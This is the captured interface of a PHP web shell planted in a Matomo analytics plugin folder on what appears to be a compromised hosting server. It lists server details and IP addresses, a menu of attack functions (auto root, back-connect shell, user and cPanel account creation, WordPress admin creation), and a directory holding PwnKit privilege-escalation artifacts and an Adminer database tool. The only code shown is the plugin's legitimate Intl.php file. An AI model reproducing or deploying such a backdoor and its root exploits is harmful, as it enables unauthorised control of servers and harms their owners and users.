Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 216.73.216.222
46 Domain
7.2.34
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
plugins /
Intl /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Commands
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
DateTimeFormatProvider.php
3.8
KB
-rw-r--r--
Intl.php
718
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Intl.php
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later * */ namespace Piwik\Plugins\Intl; class Intl extends \Piwik\Plugin { public function registerEvents() { return [ 'Translate.getClientSideTranslationKeys' => 'getClientSideTranslationKeys', ]; } public function getClientSideTranslationKeys(&$translationKeys) { $translationKeys[] = 'Intl_PeriodDay'; $translationKeys[] = 'Intl_PeriodMonth'; $translationKeys[] = 'Intl_PeriodWeek'; $translationKeys[] = 'Intl_PeriodYear'; $translationKeys[] = 'CoreHome_PeriodRange'; } }
Close